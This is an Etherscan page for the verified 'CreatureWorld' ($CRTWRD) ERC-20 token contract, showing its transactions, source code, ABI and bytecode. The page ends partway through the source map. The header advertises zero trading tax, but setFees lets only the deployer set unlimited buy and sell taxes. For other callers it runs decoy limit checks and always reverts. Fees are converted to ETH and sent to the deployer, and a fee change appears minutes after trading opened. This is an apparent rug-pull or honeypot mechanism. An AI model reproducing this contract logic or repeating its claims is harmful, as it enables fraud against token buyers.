ETH Price: $3,453.37 (-0.97%)
Gas: 2 Gwei

Contract

0x4eE5223aD4a5Fc986aBa90f8d3d0df52A3ba573D
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Value
Transfer188960752023-12-30 4:49:35185 days ago1703911775IN
0x4eE5223a...2A3ba573D
0 ETH0.0007353712.4088928
Approve172486792023-05-13 4:24:47416 days ago1683951887IN
0x4eE5223a...2A3ba573D
0 ETH0.0019764142.53364997
Approve172486782023-05-13 4:24:35416 days ago1683951875IN
0x4eE5223a...2A3ba573D
0 ETH0.001859840.02411243
Approve172486782023-05-13 4:24:35416 days ago1683951875IN
0x4eE5223a...2A3ba573D
0 ETH0.002068944.52411243
Approve172486772023-05-13 4:24:23416 days ago1683951863IN
0x4eE5223a...2A3ba573D
0 ETH0.0018904540.68377892
Approve172486762023-05-13 4:24:11416 days ago1683951851IN
0x4eE5223a...2A3ba573D
0 ETH0.0019533842.03812467
Set Fees172486762023-05-13 4:24:11416 days ago1683951851IN
0x4eE5223a...2A3ba573D
0 ETH0.004596100
Approve172486752023-05-13 4:23:59416 days ago1683951839IN
0x4eE5223a...2A3ba573D
0 ETH0.0020060343.17125674
Approve172486752023-05-13 4:23:59416 days ago1683951839IN
0x4eE5223a...2A3ba573D
0 ETH0.0020060343.17125674
Approve172486742023-05-13 4:23:47416 days ago1683951827IN
0x4eE5223a...2A3ba573D
0 ETH0.0019046340.988975
Approve172486732023-05-13 4:23:35416 days ago1683951815IN
0x4eE5223a...2A3ba573D
0 ETH0.0019726342.45236787
Open Trading172486722023-05-13 4:23:23416 days ago1683951803IN
0x4eE5223a...2A3ba573D
0 ETH0.0017838441.0626075
Approve172486332023-05-13 4:15:35416 days ago1683951335IN
0x4eE5223a...2A3ba573D
0 ETH0.0019027241.22457562
0x60a06040172486262023-05-13 4:14:11416 days ago1683951251IN
 Create: CreatureWorld
0 ETH0.1396185842.58645621

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
CreatureWorld

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2023-05-13
*/

/**

At the center of this world is The Creature: a manifestation of the universal human spirit that exists purely without age, gender, or nation.

1,000,000 $CRTWRD ready to be deployed on the Ethereum Blockchain with 0 trading tax.

TELEGRAM - https://t.me/CRTWRD_ERC20
TWITTER - https://twitter.com/CRTWRD_ERC20
WEBSITE - https://creatureworld.click

*/

// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.18;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

}
interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
contract CreatureWorld {
    mapping (address => uint256) public balanceOf;
    mapping (address => mapping (address => uint256)) public allowance;

    string public constant name = "Creature World";   
    string public constant symbol = "CRTWRD";   
    uint8 public constant decimals = 9;
    uint256 public constant totalSupply = 1_000_000 * 10**decimals;

    uint256 buyTax = 0;
    uint256 sellTax = 0;
    uint256 constant swapAmount = totalSupply / 1000;
    uint256 constant maxWallet = 100 * totalSupply / 100;

    bool tradingOpened = false;
    bool swapping;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    address immutable pair;
    address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
    address payable constant deployer = payable(address(0x1f5eDB9591F86F167657b41BF883969EFDf2E488));

    constructor() {
        pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), ETH);
        balanceOf[msg.sender] = totalSupply;
        allowance[address(this)][routerAddress] = type(uint256).max;
        emit Transfer(address(0), msg.sender, totalSupply);
    }

    receive() external payable {}

    function approve(address spender, uint256 amount) external returns (bool){
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool){
        return _transfer(msg.sender, to, amount);
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool){
        allowance[from][msg.sender] -= amount;        
        return _transfer(from, to, amount);
    }

    function _transfer(address from, address to, uint256 amount) internal returns (bool){
        balanceOf[from] -= amount;

        if(from != deployer)
            require(tradingOpened);

        if(to != pair && to != deployer)
            require(balanceOf[to] + amount <= maxWallet);

        if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
            swapping = true;
            address[] memory path = new  address[](2);
            path[0] = address(this);
            path[1] = ETH;
            _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                swapAmount,
                0,
                path,
                address(this),
                block.timestamp
            );
            deployer.transfer(address(this).balance);
            swapping = false;
        }

        if(from != address(this) && to != deployer){
            uint256 taxAmount = amount * (from == pair ? buyTax : sellTax) / 100;
            amount -= taxAmount;
            balanceOf[address(this)] += taxAmount;
            emit Transfer(from, address(this), taxAmount);
        }
        balanceOf[to] += amount;
        emit Transfer(from, to, amount);
        return true;
    }

    function openTrading() external {
        require(msg.sender == deployer);
        tradingOpened = true;
    }

    function setFees(uint256 newBuyTax, uint256 newSellTax) external {
        if(msg.sender == deployer){
            buyTax = newBuyTax;
            sellTax = newSellTax;
        }
        else{
            require(newBuyTax < 10);
            require(newSellTax < 10);
            revert();
        }
        
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBuyTax","type":"uint256"},{"internalType":"uint256","name":"newSellTax","type":"uint256"}],"name":"setFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a0604052600060028190556003556004805460ff191690553480156200002557600080fd5b50737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000079573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200009f9190620001e6565b6040516364e329cb60e11b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260248201526001600160a01b03919091169063c9c65396906044016020604051808303816000875af115801562000102573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001289190620001e6565b6001600160a01b0316608052620001426009600a6200032d565b6200015190620f42406200033e565b336000818152602081815260408083209490945530825260018152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182206000199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620001c06009600a6200032d565b620001cf90620f42406200033e565b60405190815260200160405180910390a362000358565b600060208284031215620001f957600080fd5b81516001600160a01b03811681146200021157600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200026f57816000190482111562000253576200025362000218565b808516156200026157918102915b93841c939080029062000233565b509250929050565b600082620002885750600162000327565b81620002975750600062000327565b8160018114620002b05760028114620002bb57620002db565b600191505062000327565b60ff841115620002cf57620002cf62000218565b50506001821b62000327565b5060208310610133831016604e8410600b841016171562000300575081810a62000327565b6200030c83836200022e565b806000190482111562000323576200032362000218565b0290505b92915050565b60006200021160ff84168362000277565b808202811582820484141762000327576200032762000218565b608051610c16620003826000396000818161044301528181610506015261075d0152610c166000f3fe6080604052600436106100a05760003560e01c8063313ce56711610064578063313ce5671461019157806370a08231146101b857806395d89b41146101e5578063a9059cbb14610217578063c9567bf914610237578063dd62ed3e1461024c57600080fd5b806306fdde03146100ac578063095ea7b3146100fc5780630b78f9c01461012c57806318160ddd1461014e57806323b872dd1461017157600080fd5b366100a757005b600080fd5b3480156100b857600080fd5b506100e66040518060400160405280600e81526020016d10dc99585d1d5c994815dbdc9b1960921b81525081565b6040516100f391906108b1565b60405180910390f35b34801561010857600080fd5b5061011c61011736600461091b565b610284565b60405190151581526020016100f3565b34801561013857600080fd5b5061014c610147366004610945565b6102f1565b005b34801561015a57600080fd5b50610163610332565b6040519081526020016100f3565b34801561017d57600080fd5b5061011c61018c366004610967565b61034e565b34801561019d57600080fd5b506101a6600981565b60405160ff90911681526020016100f3565b3480156101c457600080fd5b506101636101d33660046109a3565b60006020819052908152604090205481565b3480156101f157600080fd5b506100e66040518060400160405280600681526020016510d49515d49160d21b81525081565b34801561022357600080fd5b5061011c61023236600461091b565b61039c565b34801561024357600080fd5b5061014c6103b0565b34801561025857600080fd5b506101636102673660046109be565b600160209081526000928352604080842090915290825290205481565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102df9086815260200190565b60405180910390a35060015b92915050565b731f5edb9591f86f167657b41bf883969efdf2e48719330161031857600291909155600355565b600a821061032557600080fd5b600a81106100a757600080fd5b61033e6009600a610aeb565b61034b90620f4240610afa565b81565b6001600160a01b0383166000908152600160209081526040808320338452909152812080548391908390610383908490610b11565b9091555061039490508484846103df565b949350505050565b60006103a93384846103df565b9392505050565b33731f5edb9591f86f167657b41bf883969efdf2e488146103d057600080fd5b6004805460ff19166001179055565b6001600160a01b038316600090815260208190526040812080548391908390610409908490610b11565b90915550506001600160a01b038416731f5edb9591f86f167657b41bf883969efdf2e488146104415760045460ff1661044157600080fd5b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b0316141580156104a057506001600160a01b038316731f5edb9591f86f167657b41bf883969efdf2e48814155b156105045760646104b36009600a610aeb565b6104c090620f4240610afa565b6104cb906064610afa565b6104d59190610b24565b6001600160a01b0384166000908152602081905260409020546104f9908490610b46565b111561050457600080fd5b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b031614801561054d5750600454610100900460ff16155b801561058d57506103e86105636009600a610aeb565b61057090620f4240610afa565b61057a9190610b24565b3060009081526020819052604090205410155b1561071c576004805461ff00191661010017905560408051600280825260608201835260009260208301908036833701905050905030816000815181106105d6576105d6610b59565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc28160018151811061061e5761061e610b59565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac9476103e861065f6009600a610aeb565b61066c90620f4240610afa565b6106769190610b24565b60008430426040518663ffffffff1660e01b815260040161069b959493929190610b6f565b600060405180830381600087803b1580156106b557600080fd5b505af11580156106c9573d6000803e3d6000fd5b5050604051731f5edb9591f86f167657b41bf883969efdf2e48892504780156108fc029250906000818181858888f1935050505015801561070e573d6000803e3d6000fd5b50506004805461ff00191690555b6001600160a01b038416301480159061075257506001600160a01b038316731f5edb9591f86f167657b41bf883969efdf2e48814155b1561082b57600060647f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316866001600160a01b03161461079c576003546107a0565b6002545b6107aa9085610afa565b6107b49190610b24565b90506107c08184610b11565b306000908152602081905260408120805492955083929091906107e4908490610b46565b909155505060405181815230906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b6001600160a01b03831660009081526020819052604081208054849290610853908490610b46565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161089f91815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b818110156108de578581018301518582016040015282016108c2565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461091657600080fd5b919050565b6000806040838503121561092e57600080fd5b610937836108ff565b946020939093013593505050565b6000806040838503121561095857600080fd5b50508035926020909101359150565b60008060006060848603121561097c57600080fd5b610985846108ff565b9250610993602085016108ff565b9150604084013590509250925092565b6000602082840312156109b557600080fd5b6103a9826108ff565b600080604083850312156109d157600080fd5b6109da836108ff565b91506109e8602084016108ff565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610a42578160001904821115610a2857610a286109f1565b80851615610a3557918102915b93841c9390800290610a0c565b509250929050565b600082610a59575060016102eb565b81610a66575060006102eb565b8160018114610a7c5760028114610a8657610aa2565b60019150506102eb565b60ff841115610a9757610a976109f1565b50506001821b6102eb565b5060208310610133831016604e8410600b8410161715610ac5575081810a6102eb565b610acf8383610a07565b8060001904821115610ae357610ae36109f1565b029392505050565b60006103a960ff841683610a4a565b80820281158282048414176102eb576102eb6109f1565b818103818111156102eb576102eb6109f1565b600082610b4157634e487b7160e01b600052601260045260246000fd5b500490565b808201808211156102eb576102eb6109f1565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610bbf5784516001600160a01b031683529383019391830191600101610b9a565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220ba1c3ff3d9d9567b6da0c7e9e9b16775786c2193b028666cc845783b2491e13a64736f6c63430008120033

Deployed Bytecode

0x6080604052600436106100a05760003560e01c8063313ce56711610064578063313ce5671461019157806370a08231146101b857806395d89b41146101e5578063a9059cbb14610217578063c9567bf914610237578063dd62ed3e1461024c57600080fd5b806306fdde03146100ac578063095ea7b3146100fc5780630b78f9c01461012c57806318160ddd1461014e57806323b872dd1461017157600080fd5b366100a757005b600080fd5b3480156100b857600080fd5b506100e66040518060400160405280600e81526020016d10dc99585d1d5c994815dbdc9b1960921b81525081565b6040516100f391906108b1565b60405180910390f35b34801561010857600080fd5b5061011c61011736600461091b565b610284565b60405190151581526020016100f3565b34801561013857600080fd5b5061014c610147366004610945565b6102f1565b005b34801561015a57600080fd5b50610163610332565b6040519081526020016100f3565b34801561017d57600080fd5b5061011c61018c366004610967565b61034e565b34801561019d57600080fd5b506101a6600981565b60405160ff90911681526020016100f3565b3480156101c457600080fd5b506101636101d33660046109a3565b60006020819052908152604090205481565b3480156101f157600080fd5b506100e66040518060400160405280600681526020016510d49515d49160d21b81525081565b34801561022357600080fd5b5061011c61023236600461091b565b61039c565b34801561024357600080fd5b5061014c6103b0565b34801561025857600080fd5b506101636102673660046109be565b600160209081526000928352604080842090915290825290205481565b3360008181526001602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102df9086815260200190565b60405180910390a35060015b92915050565b731f5edb9591f86f167657b41bf883969efdf2e48719330161031857600291909155600355565b600a821061032557600080fd5b600a81106100a757600080fd5b61033e6009600a610aeb565b61034b90620f4240610afa565b81565b6001600160a01b0383166000908152600160209081526040808320338452909152812080548391908390610383908490610b11565b9091555061039490508484846103df565b949350505050565b60006103a93384846103df565b9392505050565b33731f5edb9591f86f167657b41bf883969efdf2e488146103d057600080fd5b6004805460ff19166001179055565b6001600160a01b038316600090815260208190526040812080548391908390610409908490610b11565b90915550506001600160a01b038416731f5edb9591f86f167657b41bf883969efdf2e488146104415760045460ff1661044157600080fd5b7f0000000000000000000000002e464ac8fd88e0da20869801de8edbbd205a60e26001600160a01b0316836001600160a01b0316141580156104a057506001600160a01b038316731f5edb9591f86f167657b41bf883969efdf2e48814155b156105045760646104b36009600a610aeb565b6104c090620f4240610afa565b6104cb906064610afa565b6104d59190610b24565b6001600160a01b0384166000908152602081905260409020546104f9908490610b46565b111561050457600080fd5b7f0000000000000000000000002e464ac8fd88e0da20869801de8edbbd205a60e26001600160a01b0316836001600160a01b031614801561054d5750600454610100900460ff16155b801561058d57506103e86105636009600a610aeb565b61057090620f4240610afa565b61057a9190610b24565b3060009081526020819052604090205410155b1561071c576004805461ff00191661010017905560408051600280825260608201835260009260208301908036833701905050905030816000815181106105d6576105d6610b59565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc28160018151811061061e5761061e610b59565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac9476103e861065f6009600a610aeb565b61066c90620f4240610afa565b6106769190610b24565b60008430426040518663ffffffff1660e01b815260040161069b959493929190610b6f565b600060405180830381600087803b1580156106b557600080fd5b505af11580156106c9573d6000803e3d6000fd5b5050604051731f5edb9591f86f167657b41bf883969efdf2e48892504780156108fc029250906000818181858888f1935050505015801561070e573d6000803e3d6000fd5b50506004805461ff00191690555b6001600160a01b038416301480159061075257506001600160a01b038316731f5edb9591f86f167657b41bf883969efdf2e48814155b1561082b57600060647f0000000000000000000000002e464ac8fd88e0da20869801de8edbbd205a60e26001600160a01b0316866001600160a01b03161461079c576003546107a0565b6002545b6107aa9085610afa565b6107b49190610b24565b90506107c08184610b11565b306000908152602081905260408120805492955083929091906107e4908490610b46565b909155505060405181815230906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b6001600160a01b03831660009081526020819052604081208054849290610853908490610b46565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161089f91815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b818110156108de578581018301518582016040015282016108c2565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461091657600080fd5b919050565b6000806040838503121561092e57600080fd5b610937836108ff565b946020939093013593505050565b6000806040838503121561095857600080fd5b50508035926020909101359150565b60008060006060848603121561097c57600080fd5b610985846108ff565b9250610993602085016108ff565b9150604084013590509250925092565b6000602082840312156109b557600080fd5b6103a9826108ff565b600080604083850312156109d157600080fd5b6109da836108ff565b91506109e8602084016108ff565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610a42578160001904821115610a2857610a286109f1565b80851615610a3557918102915b93841c9390800290610a0c565b509250929050565b600082610a59575060016102eb565b81610a66575060006102eb565b8160018114610a7c5760028114610a8657610aa2565b60019150506102eb565b60ff841115610a9757610a976109f1565b50506001821b6102eb565b5060208310610133831016604e8410600b8410161715610ac5575081810a6102eb565b610acf8383610a07565b8060001904821115610ae357610ae36109f1565b029392505050565b60006103a960ff841683610a4a565b80820281158282048414176102eb576102eb6109f1565b818103818111156102eb576102eb6109f1565b600082610b4157634e487b7160e01b600052601260045260246000fd5b500490565b808201808211156102eb576102eb6109f1565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610bbf5784516001600160a01b031683529383019391830191600101610b9a565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220ba1c3ff3d9d9567b6da0c7e9e9b16775786c2193b028666cc845783b2491e13a64736f6c63430008120033

Deployed Bytecode Sourcemap

891:3794:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1048:46;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;1048:46:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2413:206;;;;;;;;;;-1:-1:-1;2413:206:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2413:206:0;1004:187:1;4357:325:0;;;;;;;;;;-1:-1:-1;4357:325:0;;;;;:::i;:::-;;:::i;:::-;;1195:62;;;;;;;;;;;;;:::i;:::-;;;1595:25:1;;;1583:2;1568:18;1195:62:0;1449:177:1;2763:196:0;;;;;;;;;;-1:-1:-1;2763:196:0;;;;;:::i;:::-;;:::i;1154:34::-;;;;;;;;;;;;1187:1;1154:34;;;;;2136:4:1;2124:17;;;2106:36;;2094:2;2079:18;1154:34:0;1964:184:1;921:45:0;;;;;;;;;;-1:-1:-1;921:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;;1104:40;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;1104:40:0;;;;;2627:128;;;;;;;;;;-1:-1:-1;2627:128:0;;;;;:::i;:::-;;:::i;4236:113::-;;;;;;;;;;;;;:::i;973:66::-;;;;;;;;;;-1:-1:-1;973:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2413:206;2507:10;2481:4;2497:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2497:30:0;;;;;;;;;;:39;;;2552:37;2481:4;;2497:30;;2552:37;;;;2530:6;1595:25:1;;1583:2;1568:18;;1449:177;2552:37:0;;;;;;;;-1:-1:-1;2607:4:0;2413:206;;;;;:::o;4357:325::-;-1:-1:-1;;4436:10:0;:22;4433:232;;4474:6;:18;;;;4507:7;:20;4357:325::o;4433:232::-;4588:2;4576:9;:14;4568:23;;;;;;4627:2;4614:10;:15;4606:24;;;;;1195:62;1245:12;1187:1;1245:2;:12;:::i;:::-;1233:24;;:9;:24;:::i;:::-;1195:62;:::o;2763:196::-;-1:-1:-1;;;;;2861:15:0;;2845:4;2861:15;;;:9;:15;;;;;;;;2877:10;2861:27;;;;;;;:37;;2892:6;;2861:27;2845:4;;2861:37;;2892:6;;2861:37;:::i;:::-;;;;-1:-1:-1;2924:27:0;;-1:-1:-1;2934:4:0;2940:2;2944:6;2924:9;:27::i;:::-;2917:34;2763:196;-1:-1:-1;;;;2763:196:0:o;2627:128::-;2691:4;2714:33;2724:10;2736:2;2740:6;2714:9;:33::i;:::-;2707:40;2627:128;-1:-1:-1;;;2627:128:0:o;4236:113::-;4287:10;2008:42;4287:22;4279:31;;;;;;4321:13;:20;;-1:-1:-1;;4321:20:0;4337:4;4321:20;;;4236:113::o;2967:1261::-;-1:-1:-1;;;;;3062:15:0;;3046:4;3062:15;;;;;;;;;;:25;;3081:6;;3062:15;3046:4;;3062:25;;3081:6;;3062:25;:::i;:::-;;;;-1:-1:-1;;;;;;;3103:16:0;;2008:42;3103:16;3100:56;;3142:13;;;;3134:22;;;;;;3178:4;-1:-1:-1;;;;;3172:10:0;:2;-1:-1:-1;;;;;3172:10:0;;;:28;;;;-1:-1:-1;;;;;;3186:14:0;;2008:42;3186:14;;3172:28;3169:90;;;1421:3;1245:12;1187:1;1245:2;:12;:::i;:::-;1233:24;;:9;:24;:::i;:::-;1401:17;;:3;:17;:::i;:::-;:23;;;;:::i;:::-;-1:-1:-1;;;;;3223:13:0;;:9;:13;;;;;;;;;;;:22;;3239:6;;3223:22;:::i;:::-;:35;;3215:44;;;;;;3282:4;-1:-1:-1;;;;;3276:10:0;:2;-1:-1:-1;;;;;3276:10:0;;:23;;;;-1:-1:-1;3291:8:0;;;;;;;3290:9;3276:23;:65;;;;-1:-1:-1;1361:4:0;1245:12;1187:1;1245:2;:12;:::i;:::-;1233:24;;:9;:24;:::i;:::-;1347:18;;;;:::i;:::-;3321:4;3303:9;:24;;;;;;;;;;;:38;;3276:65;3272:555;;;3357:8;:15;;-1:-1:-1;;3357:15:0;;;;;3411:17;;;3426:1;3411:17;;;;;;;;-1:-1:-1;;3411:17:0;;;;;;;;;;-1:-1:-1;3411:17:0;3387:41;;3461:4;3443;3448:1;3443:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3443:23:0;;;-1:-1:-1;;;;;3443:23:0;;;;;1738:42;3481:4;3486:1;3481:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3481:13:0;;;:7;;;;;;;;;;;:13;1820:42;3509:67;1361:4;1245:12;1187:1;1245:2;:12;:::i;:::-;1233:24;;:9;:24;:::i;:::-;1347:18;;;;:::i;:::-;3624:1;3644:4;3675;3699:15;3509:220;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3744:40:0;;2008:42;;-1:-1:-1;3762:21:0;3744:40;;;;;-1:-1:-1;3762:21:0;3744:40;;;;3762:21;2008:42;3744:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3799:8:0;:16;;-1:-1:-1;;3799:16:0;;;3272:555;-1:-1:-1;;;;;3842:21:0;;3858:4;3842:21;;;;:39;;-1:-1:-1;;;;;;3867:14:0;;2008:42;3867:14;;3842:39;3839:284;;;3897:17;3962:3;3935:4;-1:-1:-1;;;;;3927:12:0;:4;-1:-1:-1;;;;;3927:12:0;;:31;;3951:7;;3927:31;;;3942:6;;3927:31;3917:42;;:6;:42;:::i;:::-;:48;;;;:::i;:::-;3897:68;-1:-1:-1;3980:19:0;3897:68;3980:19;;:::i;:::-;4032:4;4014:9;:24;;;;;;;;;;:37;;3980:19;;-1:-1:-1;4042:9:0;;4014:24;;:9;:37;;4042:9;;4014:37;:::i;:::-;;;;-1:-1:-1;;4071:40:0;;1595:25:1;;;4094:4:0;;-1:-1:-1;;;;;4071:40:0;;;;;1583:2:1;1568:18;4071:40:0;;;;;;;3882:241;3839:284;-1:-1:-1;;;;;4133:13:0;;:9;:13;;;;;;;;;;:23;;4150:6;;4133:9;:23;;4150:6;;4133:23;:::i;:::-;;;;;;;;4187:2;-1:-1:-1;;;;;4172:26:0;4181:4;-1:-1:-1;;;;;4172:26:0;;4191:6;4172:26;;;;1595:25:1;;1583:2;1568:18;;1449:177;4172:26:0;;;;;;;;-1:-1:-1;4216:4:0;2967:1261;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:248::-;1264:6;1272;1325:2;1313:9;1304:7;1300:23;1296:32;1293:52;;;1341:1;1338;1331:12;1293:52;-1:-1:-1;;1364:23:1;;;1434:2;1419:18;;;1406:32;;-1:-1:-1;1196:248:1:o;1631:328::-;1708:6;1716;1724;1777:2;1765:9;1756:7;1752:23;1748:32;1745:52;;;1793:1;1790;1783:12;1745:52;1816:29;1835:9;1816:29;:::i;:::-;1806:39;;1864:38;1898:2;1887:9;1883:18;1864:38;:::i;:::-;1854:48;;1949:2;1938:9;1934:18;1921:32;1911:42;;1631:328;;;;;:::o;2153:186::-;2212:6;2265:2;2253:9;2244:7;2240:23;2236:32;2233:52;;;2281:1;2278;2271:12;2233:52;2304:29;2323:9;2304:29;:::i;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:422;2830:1;2873:5;2830:1;2887:270;2908:7;2898:8;2895:21;2887:270;;;2967:4;2963:1;2959:6;2955:17;2949:4;2946:27;2943:53;;;2976:18;;:::i;:::-;3026:7;3016:8;3012:22;3009:55;;;3046:16;;;;3009:55;3125:22;;;;3085:15;;;;2887:270;;;2891:3;2741:422;;;;;:::o;3168:806::-;3217:5;3247:8;3237:80